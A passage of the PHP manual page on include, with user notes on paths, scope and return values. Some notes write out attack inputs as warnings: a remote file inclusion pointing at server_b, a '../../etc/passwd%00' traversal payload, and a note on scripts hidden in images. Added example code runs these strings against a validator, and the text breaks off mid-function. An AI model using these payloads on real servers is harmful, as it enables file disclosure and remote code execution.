(PHP 4, PHP 5, PHP 7)
The include statement includes and evaluates the specified file.
The documentation below also applies to require.
Files are included based on the file path given or, if none is given, the include_path specified. If the file isn't found in the include_path, include will finally check in the calling script's own directory and the current working directory before failing. The include construct will emit a warning if it cannot find a file; this is different behavior from require, which will emit a fatal error.
If a path is defined — whether absolute (starting with a drive letter or \ on Windows, or / on Unix/Linux systems) or relative to the current directory (starting with . or ..) — the include_path will be ignored altogether. For example, if a filename begins with ../, the parser will look in the parent directory to find the requested file.
For more information on how PHP handles including files and the include path, see the documentation for include_path.
When a file is included, the code it contains inherits the variable scope of the line on which the include occurs. Any variables available at that line in the calling file will be available within the called file, from that point forward. However, all functions and classes defined in the included file have the global scope.
Example #1 Basic include example
vars.php
<?php
$color = 'green';
$fruit = 'apple';
?>
test.php
<?php
echo "A $color $fruit"; // A
include 'vars.php';
echo "A $color $fruit"; // A green apple
?>
If the include occurs inside a function within the calling file, then all of the code contained in the called file will behave as though it had been defined inside that function. So, it will follow the variable scope of that function. An exception to this rule are magic constants which are evaluated by the parser before the include occurs.
Example #2 Including within functions
<?php
function foo()
{
    global $color;

    include 'vars.php';

    echo "A $color $fruit";
}

/* vars.php is in the scope of foo() so     *
 * $fruit is NOT available outside of this  *
 * scope.  $color is because we declared it *
 * as global.                               */

foo();                    // A green apple
echo "A $color $fruit";   // A green
?>
When a file is included, parsing drops out of PHP mode and into HTML mode at the beginning of the target file, and resumes again at the end. For this reason, any code inside the target file which should be executed as PHP code must be enclosed within valid PHP start and end tags.
If "URL include wrappers" are enabled in PHP, you can specify the file to be included using a URL (via HTTP or other supported wrapper - see Supported Protocols and Wrappers for a list of protocols) instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using a URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file's variable scope; the script is actually being run on the remote server and the result is then being included into the local script.
Example #3 include through HTTP
<?php
/* This example assumes that www.example.com is configured to parse .php
* files and not .txt files. Also, 'Works' here means that the variables
* $foo and $bar are available within the included file. */
// Won't work; file.txt wasn't handled by www.example.com as PHP
include 'http://www.example.com/file.txt?foo=1&bar=2';
// Won't work; looks for a file named 'file.php?foo=1&bar=2' on the
// local filesystem.
include 'file.php?foo=1&bar=2';
// Works.
include 'http://www.example.com/file.php?foo=1&bar=2';
$foo = 1;
$bar = 2;
include 'file.txt'; // Works.
include 'file.php'; // Works.
?>
A remote file may be processed on the remote server (depending on the file extension and on whether the remote server runs PHP), but it still has to produce a valid PHP script because it will be processed on the local server. If the file from the remote server should be processed there and only its output used, readfile() is a much better function to use. Otherwise, special care should be taken to ensure that the remote script produces valid and desired code.
See also Remote files, fopen() and file() for related information.
Handling Returns: include returns FALSE on failure and raises a warning. Successful includes, unless overridden by the included file, return 1. It is possible to execute a return statement inside an included file in order to terminate processing in that file and return to the script which called it. Also, it's possible to return values from included files. You can take the value of the include call as you would for a normal function. This is not, however, possible when including remote files unless the output of the remote file has valid PHP start and end tags (as with any local file). You can declare the needed variables within those tags and they will be introduced at whichever point the file was included.
Because include is a special language construct, parentheses are not needed around its argument. Take care when comparing the return value.
Example #4 Comparing return value of include
<?php
// won't work, evaluated as include(('vars.php') == TRUE), i.e. include('1')
if (include('vars.php') == TRUE) {
    echo 'OK';
}

// works
if ((include 'vars.php') == TRUE) {
    echo 'OK';
}
?>
Example #5 include and the return statement
return.php
<?php
$var = 'PHP';
return $var;
?>
noreturn.php
<?php
$var = 'PHP';
?>
testreturns.php
<?php
$foo = include 'return.php';
echo $foo; // prints 'PHP'
$bar = include 'noreturn.php';
echo $bar; // prints 1
?>
$bar is the value 1 because the include was successful. Notice the difference between the above examples. The first uses return within the included file while the other does not. If the file can't be included, FALSE is returned and E_WARNING is issued.
If there are functions defined in the included file, they can be used in the main file regardless of whether they are defined before or after the return. If the file is included twice, PHP 5 issues a fatal error because the functions were already declared, while PHP 4 doesn't complain about functions defined after return. It is recommended to use include_once instead of checking whether the file was already included and conditionally returning inside the included file.
Another way to "include" a PHP file into a variable is to capture the output by using the Output Control Functions with include. For example:
Example #6 Using output buffering to include a PHP file into a string
<?php
$string = get_include_contents('somefile.php');

function get_include_contents($filename) {
    if (is_file($filename)) {
        ob_start();
        include $filename;
        return ob_get_clean();
    }
    return false;
}
?>
In order to automatically include files within scripts, see also the auto_prepend_file and auto_append_file configuration options in php.ini.
Note: Because this is a language construct and not a function, it cannot be called using variable functions.
See also require, require_once, include_once, get_included_files(), readfile(), virtual(), and include_path.
This might be useful:
<?php
include $_SERVER['DOCUMENT_ROOT']."/lib/sample.lib.php";
?>
So you can move script anywhere in web-project tree without changes.
I cannot emphasize enough knowing the active working directory. Find it by: echo getcwd();
Remember that if file A includes file B, and B includes file C; the include path in B should take into account that A, not B, is the active working directory.
When including a file using its name directly, without specifying that we are talking about the current working directory, i.e. saying (include "file") instead of (include "./file"), PHP will search first in the current working directory (given by getcwd()), then next search for it in the directory of the script being executed (given by __DIR__).
This is an example to demonstrate the situation:
We have two directory structures:
-dir1
----script.php
----test
----dir1_test
-dir2
----test
----dir2_test
dir1/test contains the following text :
This is test in dir1
dir2/test contains the following text:
This is test in dir2
dir1_test contains the following text:
This is dir1_test
dir2_test contains the following text:
This is dir2_test
script.php contains the following code:
<?php
echo 'Directory of the current calling script: ' . __DIR__;
echo '<br />';
echo 'Current working directory: ' . getcwd();
echo '<br />';
echo 'including "test" ...';
echo '<br />';
include 'test';
echo '<br />';
echo 'Changing current working directory to dir2';
chdir('../dir2');
echo '<br />';
echo 'Directory of the current calling script: ' . __DIR__;
echo '<br />';
echo 'Current working directory: ' . getcwd();
echo '<br />';
echo 'including "test" ...';
echo '<br />';
include 'test';
echo '<br />';
echo 'including "dir2_test" ...';
echo '<br />';
include 'dir2_test';
echo '<br />';
echo 'including "dir1_test" ...';
echo '<br />';
include 'dir1_test';
echo '<br />';
echo 'including "./dir1_test" ...';
echo '<br />';
(@include './dir1_test') or die('couldn\'t include this file ');
?>
The output of executing script.php is :
Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir1
including "test" ...
This is test in dir1
Changing current working directory to dir2
Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir2
including "test" ...
This is test in dir2
including "dir2_test" ...
This is dir2_test
including "dir1_test" ...
This is dir1_test
including "./dir1_test" ...
couldn't include this file
As a rule of thumb, never include files using relative paths. To do this efficiently, you can define constants as follows:
----
<?php // prepend.php - autoprepended at the top of your tree
define('MAINDIR',dirname(__FILE__) . '/');
define('DL_DIR',MAINDIR . 'downloads/');
define('LIB_DIR',MAINDIR . 'lib/');
?>
----
and so on. This way, the files in your framework will only have to issue statements such as this:
<?php
require_once(LIB_DIR . 'excel_functions.php');
?>
This also frees you from having to check the include path each time you do an include.
If you're running scripts from below your main web directory, put a prepend.php file in each subdirectory:
--
<?php
include(dirname(dirname(__FILE__)) . '/prepend.php');
?>
--
This way, the prepend.php at the top always gets executed and you'll have no path handling headaches. Just remember to set the auto_prepend_file directive on your .htaccess files for each subdirectory where you have web-accessible scripts.
If you want to have include files, but do not want them to be accessible directly from the client side, please, please, for the love of keyboard, do not do this:
<?php
# index.php
define('what', 'ever');
include 'includeFile.php';
# includeFile.php
// check if what is defined and die if not
?>
The reason you should not do this is because there is a better option available. Move the includeFile(s) out of the document root of your project. So if the document root of your project is at "/usr/share/nginx/html", keep the include files in "/usr/share/nginx/src".
<?php
# index.php (in document root (/usr/share/nginx/html))
include __DIR__ . '/../src/includeFile.php';
?>
Since user can't type 'your.site/../src/includeFile.php', your includeFile(s) would not be accessible to the user directly.
If you're doing a lot of dynamic/computed includes (>100, say), then you may well want to know this performance comparison: if the target file doesn't exist, then an @include() is *ten* *times* *slower* than prefixing it with a file_exists() check. (This will be important if the file will only occasionally exist - e.g. a dev environment has it, but a prod one doesn't.)
Wade.
If you use php >5.2, don't forget to set up the allow_url_include parameter in php.ini file .. If not you can search a long long long long time after this like-a-bug problem ;)
http://www.php.net/manual/en/ini.php
Sometimes it will be useful to include a string as a filename
<?php
//get content
$cFile = file_get_contents('crypted.file');
//decrypt the content
$content = decrypte($cFile);
//include this
include("data://text/plain;base64,".base64_encode($content));
//or
include("data://text/plain,".urlencode($content));
?>
It's worth noting that PHP provides an OS-context aware constant called DIRECTORY_SEPARATOR. If you use that instead of slashes in your directory paths your scripts will be correct whether you use *NIX or (shudder) Windows. (In a semi-related way, there is a smart end-of-line character, PHP_EOL)
Example:
<?php
$cfg_path
    = 'includes'
    . DIRECTORY_SEPARATOR
    . 'config.php'
;
require_once($cfg_path);
?>
Include function, utilizing extract and compact to post variables to and return from an include file (great for configurations, ex: DB connection info, or whatever else you can imagine).
<?php
# include function allowing variables to be posted to and returned from the target script
function inc( $__path, $__return='.', array $__post=array() ) {
    # post var's to the local scope
    if ( count( $__post ) )
        extract($__post, EXTR_SKIP);

    # include the file and store the result
    if ( $__result = include $__path ) {
        # return requested variables from the included file
        if ( is_array($__return) )
            $result = compact($__return);
        # Return ALL variables defined from within the included file
        # NOTE: $__post keys are NOT included!
        else if ( $__return == '.' )
            $result = compact( array_diff( array_keys(get_defined_vars()),
                array('GLOBALS', '__path', '__return', '__post', '__result')
                + array_keys($__post) ) );
        # Is $__return a variable from the file?
        else if ( $__return && isset($$__return) )
            $result = array( $__return => $$__return );
        else
            $result = array();

        # unshift the include result into $result
        array_unshift($result, $__result);
        return $result;
    }
    return array($__result);
}
?>
A word of warning about lazy HTTP includes - they can break your server.
If you are including a file from your own site, do not use a URL however easy or tempting that may be. If all of your PHP processes are tied up with the pages making the request, there are no processes available to serve the include. The original requests will sit there tying up all your resources and eventually time out.
Use file references wherever possible. This caused us a considerable amount of grief (Zend/IIS) before I tracked the problem down.
I was having problems when HTTP headers were being sent before I was ready. I discovered that this happened only when I was including a file at the top of my script. Since my included file only contained PHP with no whitespace outside the tags, this behavior seemed incorrect.
The editor I was using was saving the files in UTF8 format, sometimes including the redundant Byte Order Mark at the beginning of the file. Any Unicode-aware editor would implicitly hide the presence of the BOM from the user, making it hard to notice the problem. However, by using a hex editor I was able to see and remove the three bytes, restoring normal behavior.
Moral: Prevent your editor from adding an invisible Unicode Byte Order Mark to the beginning of your source code!
Linking to CSS/JavaScript resources through an included file has bugged me for a long time because if I have a directory structure like:
/www
index.php
/sub_dir
index.php
/includes
header.php
/style
main.css
where both index.php files include header.php and the header.php file includes something like:
<link rel="stylesheet" type="text/css" href="style/main.css">
This will be included for /index.php but not for /sub_dir/index.php. I read through a few different ways to use relative includes but those are generally meant for the php include function not the HTML <link>. I didn't really love the idea of a new function that I would pass both the filename and a '../' string into which it could use in the href. I also didn't want to just use /style/main.css because in development it is not hosted in my root directory. Although I could change my configuration or my include_path I really just wanted to find a way for PHP to figure out the relative path for me. I finally found a solution that met my needs and here it is:
<?php
$include_dist = substr_count(dirname(__FILE__), DIRECTORY_SEPARATOR);
$calling_dist = substr_count(dirname($_SERVER['SCRIPT_FILENAME']), DIRECTORY_SEPARATOR);
?>
<link rel="stylesheet" type="text/css" href="<?=str_repeat('../', $calling_dist - $include_dist + 1)?>style/main.css">
In this case I added one to the difference to account for the fact that the include is one directory away from the base. This also means that str_repeat won't be passed a negative value, which would cause an error. dirname(__FILE__) gets the directory of the file being included while dirname($_SERVER['SCRIPT_FILENAME']) gets the directory of the file including it. The script simply finds the difference in how far off the base directory the two are and prints the appropriate number of '../' before the URL.
NOTE: dirname(__FILE__) can be replaced by __DIR__ in PHP greater than or equal to 5.3.0
When I'm dealing with a package that uses relative includes of its own, rather than modify all of their includes, I found it was easier to change PHP's working directory before and after the include, like so:
<?php
$wd_was = getcwd();
chdir("/path/to/included/app");
include("mainfile.php");
chdir($wd_was);
?>
This way neither my includes nor theirs are affected; they all work as expected.
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code:
<?php
// File: index.php
include ($_GET['id'].".php");
?>
This is, of course, not a very good way to program, but I actually found a program doing this.
Then, we have a server B, also Linux with PHP installed, that has the file list.php with the following code:
<?php
// File: list.php
$output = "";
exec("ls -al",$output);
foreach($output as $line) {
    echo $line . "<br>\n";
}
?>
If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of files.
But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it always worked.
This is only an example, but there have been hacks uploading files to servers etc.
So, always be extremely careful with remote includes.
As to the security risks of an include statement like:
<?php
include($page);
?>
This is a really bad way of writing an include statement because the user could include server- or password-files which PHP can read as well. You could check the $page variable first but a simple check like
<?php
if ( file_exists($page) AND !preg_match("#^\.\./#",$page) )
    include($page);
?>
won't make it any safer. ( Think of $page = 'pages/../../../etc/passwd' )
To be sure only the pages you want the user to call are called, use something like this:
<?php
$path = 'pages/';
$extension = '.php';
if ( preg_match("#^[a-z0-9_]+$#i",$page) ){
    $filename = $path.$page.$extension;
    include($filename);
}
?>
This will make sure that only files from the directory $path are called, if they have the file extension $extension.
Something not previously stated here - but found elsewhere - is that if a file is included using a URL and it has a '.php' extension - the file is parsed by php - not just included as it would be if it were linked to locally.
This means the functions and (more importantly) classes included will NOT work.
for example:
<?php
include "http://example.com/MyInclude.php";
?>
would not give you access to any classes or functions within the MyInclude.php file.
to get access to the functions or classes you need to include the file with a different extension - such as '.inc' This way the php interpreter will not 'get in the way' and the text will be included normally.
I have a need to include a lot of files, all of which are contained in one directory. Support for things like <?php include_once 'dir/*.php'; ?> would be nice, but it doesn't exist.
Therefore I wrote this quick function (located in a file automatically included by auto_prepend_file):
<?php
function include_all_once ($pattern) {
    foreach (glob($pattern) as $file) { // remember the { and } are necessary!
        include_once $file; // include_once, as the function name promises
    }
}
// used like
include_all_once('dir/*.php');
?>
A fairly obvious solution. It doesn't deal with relative file paths though; you still have to do that yourself.
About the problem to include a script in the global scope, after many tests with different solutions, I reached my point. I post it in the hope it may be useful.
At first I built my "globalScopeSimulator" class, but an include called inside a class is not the best solution: if it contains some user code, the user will access to the $this reserved variable and even to all the private members... Critical issue!
That's why I turned back into a function solution.
Another advantage is that I didn't have to make use of the deprecable "global" keyword, since I *imported* the global scope inside the function, with the extract() function.
Using the EXTR_REFS flag this trick does not waste memory, since the extracted variables are not a copy, but a reference to the global ones.
<?php
function global_include($script_path) {
    // check if the file to include exists:
    if (isset($script_path) && is_file($script_path)) {
        // extract variables from the global scope:
        extract($GLOBALS, EXTR_REFS);
        ob_start();
        include($script_path);
        return ob_get_clean();
    } else {
        ob_clean();
        trigger_error('The script to parse in the global scope was not found');
    }
}
?>
Hope it helps... :)
Cheers and happy coding!
If you have a problem with "Permission denied" errors (or other permissions problems) when including files, check:
1) That the file you are trying to include has the appropriate "r" (read) permission set, and
2) That all the directories that are ancestors of the included file, but not of the script including the file, have the appropriate "x" (execute/search) permission set.
If you want the "include" function to work correctly with paths and GET parameters, try the following code:
<?php
$_GET['param1'] = 'param1value';
$_GET['param2'] = 'param2value';
@include($_SERVER['DOCUMENT_ROOT'] . "/path1/path2/include.php");
?>
Then within your "include.php" use $_GET['param1'] and $_GET['param2'] to access values of parameters.
I spent several hours to figure this out.
You can use include in echo short tags. To avoid include echoing '1' when you don't need it, simply add an empty string and a delimiter to the beginning of the statement.
Example : <?='';include('foobar.php')?>
Well now, I am confused because these pages all show them as functions:
Include(), require(), require_once(), include_once()
Yet ALL of the examples show the PEAR way:
http://pear.php.net/manual/en/standards.including.php
"Note: include_once and require_once are statements, not functions. Parentheses should not surround the subject filename."
include_once "a.php";
To change all require_once('foo.php'); to require_once 'foo.php' execute this:
cd /var/www/
find . -name '*.php' -print | xargs egrep -l \
'require_once\s*(\(.*\));' | xargs sed -i.sedorig -e \
's/require_once\s*(\(.*\));/require_once \1;/'
(thanks to Robert Hajime Lanning for that)
Then to remove all the ".php.sedorig" backup files execute this:
find . -name "*.php.sedorig" -type f -exec rm -rf {} \;
I would like to point out the difference in behavior in IIS/Windows and Apache/Unix (not sure about any others, but I would think that any server under Windows will behave the same as IIS/Windows and any server under Unix will behave the same as Apache/Unix) when it comes to the path specified for included files.
Consider the following:
<?php
include '/Path/To/File.php';
?>
In IIS/Windows, the file is looked for at the root of the virtual host (we'll say C:\Server\Sites\MySite) since the path began with a forward slash. This behavior works in HTML under all platforms because browsers interpret the / as the root of the server.
However, Unix file/folder structuring is a little different. The / represents the root of the hard drive or current hard drive partition. In other words, it would basically be looking for root:/Path/To/File.php instead of serverRoot:/Path/To/File.php (which we'll say is /usr/var/www/htdocs). Thusly, an error/warning would be thrown because the path doesn't exist in the root path.
I just thought I'd mention that. It will definitely save some trouble for those users who work under Windows and transport their applications to a Unix-based server.
A work around would be something like:
<?php
$documentRoot = null;

if (isset($_SERVER['DOCUMENT_ROOT'])) {
    $documentRoot = $_SERVER['DOCUMENT_ROOT'];

    if (strstr($documentRoot, '/') || strstr($documentRoot, '\\')) {
        if (strstr($documentRoot, '/')) {
            $documentRoot = str_replace('/', DIRECTORY_SEPARATOR, $documentRoot);
        }
        elseif (strstr($documentRoot, '\\')) {
            $documentRoot = str_replace('\\', DIRECTORY_SEPARATOR, $documentRoot);
        }
    }

    if (preg_match('/[^\\/]{1}\\[^\\/]{1}/', $documentRoot)) {
        $documentRoot = preg_replace('/([^\\/]{1})\\([^\\/]{1})/', '\\1DIR_SEP\\2', $documentRoot);
        $documentRoot = str_replace('DIR_SEP', '\\\\', $documentRoot);
    }
}
else {
    /**
     * I usually store this file in the Includes folder at the root of my
     * virtual host. This can be changed to wherever you store this file.
     *
     * Example:
     * If you store this file in the Application/Settings/DocRoot folder at the
     * base of your site, you would change this array to include each of those
     * folders.
     *
     * <code>
     * $directories = array(
     *     'Application',
     *     'Settings',
     *     'DocRoot'
     * );
     * </code>
     */
    $directories = array(
        'Includes'
    );

    if (defined('__DIR__')) {
        $currentDirectory = __DIR__;
    }
    else {
        $currentDirectory = dirname(__FILE__);
    }

    $currentDirectory = rtrim($currentDirectory, DIRECTORY_SEPARATOR);
    $currentDirectory = $currentDirectory . DIRECTORY_SEPARATOR;

    foreach ($directories as $directory) {
        $currentDirectory = str_replace(
            DIRECTORY_SEPARATOR . $directory . DIRECTORY_SEPARATOR,
            DIRECTORY_SEPARATOR,
            $currentDirectory
        );
    }

    $currentDirectory = rtrim($currentDirectory, DIRECTORY_SEPARATOR);

    // Use the derived directory as the document root; without this
    // assignment the constant below would be null in this branch.
    $documentRoot = $currentDirectory;
}

define('SERVER_DOC_ROOT', $documentRoot);
?>
Using this file, you can include files using the defined SERVER_DOC_ROOT constant and each file included that way will be included from the correct location and no errors/warnings will be thrown.
Example:
<?php
include SERVER_DOC_ROOT . '/Path/To/File.php';
?>
Be very careful with including files based on user-inputted data. For instance, consider this code sample:
index.php:
<?php
$page = $_GET['page'];
if (file_exists('pages/'.$page.'.php'))
{
    include('pages/'.$page.'.php');
}
?>
Then go to URL:
index.php?page=/../../../../../../etc/passwd%00.html
file_exists() will return true, your passwd file will be included and since it's not php code it will be output directly to the browser.
Of course the same vulnerability exists if you are reading a file to display, as in a templating engine.
You absolutely have to sanitize any input string that will be used to access the filesystem, you can't count on an absolute path or appended file extension to secure it. Better yet, know exactly what options you can accept and accept only those options.
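The two notes above on including a page named by request data (the pages/ pattern check and the index.php?page=... case) call for the same validation, shown here as an added example that is not code from the manual or from any note's author. resolve_page(), the allow-list and the temporary directory tree are assumptions made for the demonstration; it goes one step past the notes by canonicalising with realpath(), which also catches a symlink that leaves pages/.

```php
<?php
// Added example (PHP 7.1+). resolve_page() and the directory layout are
// hypothetical; nothing here comes from the manual or the notes above.

/**
 * Map a user-supplied page name to a file that is safe to include.
 * Returns the canonical path, or null if the name must be rejected.
 */
function resolve_page(string $page, string $baseDir, array $allowed): ?string
{
    // 1. Syntax: letters, digits, underscore only. \A and \z anchor the whole
    //    string, so "home\n", NUL bytes, "/", "." and "scheme://" all fail.
    if (!preg_match('/\A[a-z0-9_]{1,64}\z/i', $page)) {
        return null;
    }

    // 2. Allow-list: accept only names the application knows about.
    if (!in_array($page, $allowed, true)) {
        return null;
    }

    // 3. Containment: canonicalise (resolves "..", symlinks) and require the
    //    result to sit under the canonical base directory.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// ---- Constructed demo data: a throw-away tree under the temp directory ----
$root  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . bin2hex(random_bytes(4));
$pages = $root . DIRECTORY_SEPARATOR . 'pages';
mkdir($pages, 0700, true);
file_put_contents($pages . '/home.php', "<?php return 'home page';");
file_put_contents($root . '/secret.php', "<?php return 'outside pages/';");
// An allow-listed name whose file is a symlink leaving pages/ (where symlinks
// are unavailable the call fails quietly and the name is simply missing).
@symlink($root . '/secret.php', $pages . '/about.php');

$allowed = ['home', 'about'];
$inputs  = [
    'home',                                   // valid page
    'about',                                  // allow-listed, but symlink escapes pages/
    'pages/../../../etc/passwd',              // traversal string quoted in the note above
    "/../../../../../../etc/passwd\0.html",   // NUL-byte variant quoted in the note above
    'http://server_b/list',                   // remote include quoted in the note above
    "home\n",                                 // would pass a pattern anchored with a bare $
    'secret',                                 // well-formed but not allow-listed
];

foreach ($inputs as $input) {
    $file   = resolve_page($input, $pages, $allowed);
    $result = $file === null ? 'rejected' : 'included: ' . (include $file);
    printf("%-45s %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), $result);
}

// Clean up the constructed tree.
@unlink($pages . '/about.php');
unlink($pages . '/home.php');
unlink($root . '/secret.php');
rmdir($pages);
rmdir($root);
```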
Another way of getting the proper include path relative to the current file, rather than the working directory is:
<?php
include realpath(dirname(__FILE__) . "/" . "relative_path");
?>
What a pain! I have struggled with including files from various subdirectories. My server doesn't support an easy way to get to the root HTML directory so this is what I came up with:
<?php
$times = substr_count($_SERVER['PHP_SELF'],"/");
$rootaccess = "";
$i = 1;
while ($i < $times) {
    $rootaccess .= "../";
    $i++;
}
include ($rootaccess."foo/bar.php");
?>
This will give you what it takes to get to the root directory, regardless of how many subdirectories you have traveled through.
To Windows coders, if you are upgrading from 5.3 to 5.4 or even 5.5; if you have coded a path in your require or include you will have to be careful. Your code might not be backward compatible. To be more specific; the code escape for ESC, which is "\e" was introduced in php 5.4.4 + but if you use 5.4.3 you should be fine. For instance:
Test script:
-------------
<?php
require("C:\element\scripts\include.php");
?>
In php 5.3.* to php 5.4.3
----------------------------
If you use require("C:\element\scripts\include.php") it will work fine.
If php 5.4.4 + It will break.
------------------------------
Warning: require(C:←lement\scripts\include.php): failed to open stream: In
valid argument in C:\element\scripts\include.php on line 20
Fatal error: require(): Failed opening required 'C:←lement\scripts\include.php
Solution:
-----------
Theoretically, you should always be using "\\" instead of "\" when you write php on a windows machine OR use "/" like in Linux and you should be fine since "\" is an escape character in most programming languages.
If you are not using absolute paths, stream functions are your best friend, like stream_resolve_include_path(), but you need to include the path you are resolving in your php.ini (include_path variable).
I hope this makes sense and I hope it will help someone sometime down the road.
cheers,
You need to test to see if include() is equal to 1 to see if it's successful. For some reason it tests success instead of failure.
So to test if the include failed, you need to test like this:
<?php
if ((include 'inc/db.php') !== 1)
{
    die('Include failed.');
}
?>
The docs say to test against 'OK', which is incorrect, as the return value is int(1);
Notice that using @include (instead of include without @) will set the local value of error_reporting to 0 inside the included script.
Consider the following:
<?php
ini_set('error_reporting', E_ALL);
echo "Own value before: ";
echo ini_get('error_reporting');
echo "\r\n";
echo "include foo.php: ";
include('foo.php');
echo "@include foo.php: ";
@include('foo.php');
echo "Own value now: " . ini_get('error_reporting');
?>
foo.php
<?php
echo ini_get('error_reporting') . "\r\n";
?>
Output:
Own value before: 32767
include foo.php: 32767
@include foo.php: 0
Own value now: 32767
Just about any file type can be 'included' or 'required'. By sending appropriate headers, like in the below example, the client would normally see the output in their browser as an image or other intended mime type.
You can also embed text in the output, like in the example below. But an image is still an image to the client's machine. The client must open the downloaded file as plain/text to see what you embedded.
<?php
header('Content-type: image/jpeg');
header('Content-Disposition: inline;');
include '/some_image.jpg';
echo 'This file was provided by example@user.com.';
?>
Which brings us to a major security issue. Scripts can be hidden within images or files using this method. For example, instead echoing "<?php phpinfo(); ?>", a foreach/unlink loop through the entire filesystem, or some other method of disabling security on your machine.
'Including' any file made this way will execute those scripts. NEVER 'include' anything that you found on the web or that users upload or can alter in any way. Instead, use something a little safer to display the found file, like "echo file_get_contents('/some_image.jpg');"
Because there is no quick way to check if a file is in include_path, I've made this function:
<?php
function is_includeable($filename, $returnpaths = false) {
$include_paths = explode(PATH_SEPARATOR, ini_get('include_path'));
foreach ($include_paths as $path) {
$include = $path.DIRECTORY_SEPARATOR.$filename;
if (is_file($include) && is_readable($include)) {
if ($returnpaths == true) {
$includeable_paths[] = $path; // same variable name as the one tested in the return statement
} else {
return true;
}
}
}
return (isset($includeable_paths) && $returnpaths == true) ? $includeable_paths : false;
}
?>
This is not directly linked to the include function itself. But I had a problem with dynamically generated include-files that could generate parse errors and cause the whole script to parse-error.
So as I could not find any ready solution for this problem I wrote the mini-function. It's not the most handsome solution, but it works for me.
<?php
function ChkInc($file){
if(substr(exec("php -l $file"), 0, 28) == "No syntax errors detected in"){
return true;
}else{
return false;
}
}
?>
If someone else has a better solution, do post it...
Note: remember that this function uses unchecked variables passed to exec, so don't use it for direct user input without improving it.
//Gillis Danielsen
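One way to make the improvement the note above asks for, as an added example that is not the note author's code: each argument is quoted with escapeshellarg() and the result is read from the exit status of "php -l". lint_php_file() is a hypothetical name, and PHP_BINARY is assumed to point at a CLI binary (pass the path explicitly under a web SAPI).

```php
<?php
// Added example; lint_php_file() is a hypothetical name, not part of the note above.
function lint_php_file(string $file, string $phpBinary = PHP_BINARY): bool
{
    // Only lint a real, readable file; realpath() also normalises the path.
    $path = realpath($file);
    if ($path === false || !is_file($path) || !is_readable($path)) {
        return false;
    }
    // escapeshellarg() quotes each argument, so shell metacharacters in a
    // file name (";", "|", "$(...)", backticks) reach php as literal text.
    $cmd = escapeshellarg($phpBinary) . ' -l ' . escapeshellarg($path) . ' 2>&1';
    exec($cmd, $outputLines, $exitCode);
    // "php -l" exits with status 0 when it finds no syntax errors, which is a
    // sturdier signal than matching the start of the message text.
    return $exitCode === 0;
}

// Constructed demo input: one valid and one broken script in the temp directory.
if (PHP_SAPI === 'cli') {
    $good = tempnam(sys_get_temp_dir(), 'lint');
    $bad  = tempnam(sys_get_temp_dir(), 'lint');
    file_put_contents($good, "<?php echo 'ok';\n");
    file_put_contents($bad, "<?php echo 'broken\n");   // unterminated string
    var_dump(lint_php_file($good));
    var_dump(lint_php_file($bad));
    unlink($good);
    unlink($bad);
}
```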
Hi, there...
I've used this in order to grab the output from an include() but without sending it to the buffer.
Headers are not sent either.
<?php
function include2($file){
$buffer = ob_get_contents();
include $file;
$output = substr(ob_get_contents(),strlen($buffer));
ob_end_clean();
ob_start();
echo $buffer;
return $output;
}
?>
While you can return a value from an included file, and receive the value as you would expect, you do not seem to be able to return a reference in any way (except in array, references are always preserved in arrays).
For example, we have two files, file 1.php contains...
<?php
function &x(&$y)
{
return include(dirname(__FILE__) . '/2.php');
}
$z = "FOO\n";
$z2 = &x($z);
echo $z2;
$z = "NOO\n";
echo $z2;
?>
and file 2.php contains...
<?php return $y; ?>
calling 1.php will produce
FOO
FOO
i.e. the reference passed to x() is broken on its way out of the include()
Neither can you do something like <?php $foo =& include(....); ?> as that's a parse error (include is not a real function, so can't take a reference in that case). And you also can't do <?php return &$foo ?> in the included file (parse error again, nothing to assign the reference to).
The only solutions are to set a variable with the reference which the including code can then return itself, or return an array with the reference inside.
---
James Sleeman
http://www.gogo.co.nz/
If you wish to abstract away include calls inside functions, or programmatically juggle files to include using functions, just remember:
1. Declare any variables as global if you want those variables "included" in the global scope (ie. if they are used outside the file).
2. Functions are naturally global, so files that only contain functions (libs, sets of api's what have you) can be included anywhere.
eg.
<?php
function nav($i){
include "nav$i.php";
}
nav(1);
// same as...
include "nav1.php";
// ...as long as variables are global
?>
So don't feel you can only include/require at the beginning of files, or outside/before functions. You can totally program any sophisticated include behavior.
Easy way to set $_GET values for local includes.
This is an easy way to make up fake URLs for SEO purposes that are really just running other PHP pages with special $_GET values.
This will NOT work:
<?PHP
include('communities.php?show=gated&where=naples');
?>
However, this will:
<?PHP
$_GET = array();
$_GET['show'] = 'gated';
$_GET['where'] = 'naples';
include('communities.php');
?>
Putting this on your page and nothing else will give the same result as going to
'communities.php?show=gated&where=naples'
but the URL can be whatever you want it to be.
<?php
@include('/foo') OR die ("bar"); # <- Won't work
@(include('/foo')) OR die ("bar"); # <- Works
?>
so "or" has priority over "include"
Two functions to help:
<?php
function add_include_path ($path)
{
foreach (func_get_args() AS $path)
{
if (!file_exists($path) OR (file_exists($path) && filetype($path) !== 'dir'))
{
trigger_error("Include path '{$path}' not exists", E_USER_WARNING);
continue;
}
$paths = explode(PATH_SEPARATOR, get_include_path());
if (array_search($path, $paths) === false)
array_push($paths, $path);
set_include_path(implode(PATH_SEPARATOR, $paths));
}
}
function remove_include_path ($path)
{
foreach (func_get_args() AS $path)
{
$paths = explode(PATH_SEPARATOR, get_include_path());
if (($k = array_search($path, $paths)) !== false)
unset($paths[$k]);
else
continue;
if (!count($paths))
{
trigger_error("Include path '{$path}' can not be removed because it is the only", E_USER_NOTICE);
continue;
}
